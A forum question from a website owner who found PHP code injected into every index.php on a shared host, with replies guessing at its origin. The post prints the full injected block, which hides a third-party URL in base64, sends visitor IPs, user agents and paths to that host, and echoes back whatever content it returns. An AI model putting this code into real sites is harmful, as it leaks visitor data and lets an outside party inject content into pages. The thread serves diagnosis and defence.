# index.php hacked

Tags: database, security, web, xss, rows

*Just noticed that the code was injected into every index.php file in the website directory as well as every index.php file in other website directories on the same server!

Hi I have been observing a quirky thing going on with one of my websites; Rows in a database table are mysteriously disappearing. Not instantly, but rather over the course of a day, like one row every 30 minutes or so. Anyway, I have been trying really hard to figure out what is causing this, but I have not been able to pinpoint the source of the disappearing rows. So I have begun to feel suspicious that perhaps somebody else is doing it with a bot or something evil, though the effects have not been devastating to the MySQL data (I figure a hacker would want to screw up the entire database if he/she has a chance... not just causally delete a single row every 30 minutes).

So when I opened up the index file on my server I found a block of code that I did not write, and can't understand... indicating that somebody else was able to modify the index.php file on the server. The injected block of php code is attached below:

```
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
    $stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
        @$stCurlHandle = curl_init( $stCurlLink ); 
}
} 
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle); 
if ($sResult[0]=="O") 
 {$sResult[0]=" ";
  echo $sResult; // Statistic code end
  }
curl_close($stCurlHandle); 
}
}
```

I host with HostGator. Could this code be responsible for the disappearing rows in the database?
Does anybody know what this injected code does or what it can do to my website? Is this XSS or is it some other kind of hack? How can I prevent this kind of thing? Any advice appreciated.

Comment: This code is sending all the url hits of your site to http://browserglobalstat.com/statD/stat.php addresses. If they find any url to delete some rows within your code they are using those.

Answer (score 0):

No, this is just a simple ftp password stealing. Perhaps you use Windows and Total Commander to upload your content, with the password for the account stored. The virus(?) on the Windows workstation connects legally to the FTP server, and appends the code to every directory's index.php. Clean your workstation and change FTP password!